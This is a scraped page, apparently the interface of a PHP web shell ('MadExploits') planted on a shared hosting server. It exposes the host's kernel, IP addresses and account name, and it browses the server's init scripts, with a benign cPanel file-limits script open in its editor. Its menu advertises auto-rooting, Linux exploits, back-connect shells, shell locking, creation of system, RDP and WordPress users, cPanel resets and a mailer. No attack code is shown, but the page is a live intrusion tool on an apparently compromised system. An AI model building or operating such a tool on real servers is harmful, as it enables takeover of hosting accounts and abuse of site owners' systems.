Linux box2263.bluehost.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 173.254.88.118 | : 216.73.216.46
Cant Read [ /etc/named.conf ]
8.1.34
studipq1
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc.d /
rc6.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K15rbld
1.81
KB
-rwxr-xr-x
K50netconsole
4.46
KB
-rwxr-xr-x
K90network
7.74
KB
-rwxr-xr-x
K91filelimits
1.04
KB
-rwxr-xr-x
K99sys-snap
2.42
KB
-rwx------
K99tarpit
570
B
-rwxr-x---
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K91filelimits
#!/bin/sh # # filelimits Increase filesystem limits # # chkconfig: 2345 11 91 # description: Increases max open file limits # probe: false # Source function library. if [ -f /etc/init.d/functions ]; then . /etc/init.d/functions elif [ -f /etc/rc.d/init.d/functions ]; then . /etc/rc.d/init.d/functions else echo "Could not find functions file, your system may be broken" exit 1 fi # See how we were called. case "$1" in start) if [ -e "/usr/local/cpanel/scripts/increase_filesystem_limits" ]; then action "Increasing file system limits (v2)" /bin/true /usr/local/cpanel/scripts/increase_filesystem_limits else action "Increasing file system limits" /bin/true echo 131072 > /proc/sys/fs/file-max if [ -e "/proc/sys/fs/dquot-max" ]; then echo 16384 > /proc/sys/fs/dquot-max fi fi ;; stop) ;; restart) $0 stop $0 start ;; reload) $0 restart ;; *) echo "Usage: filelimits {start|stop|restart|reload}" exit 1 esac exit 0
Close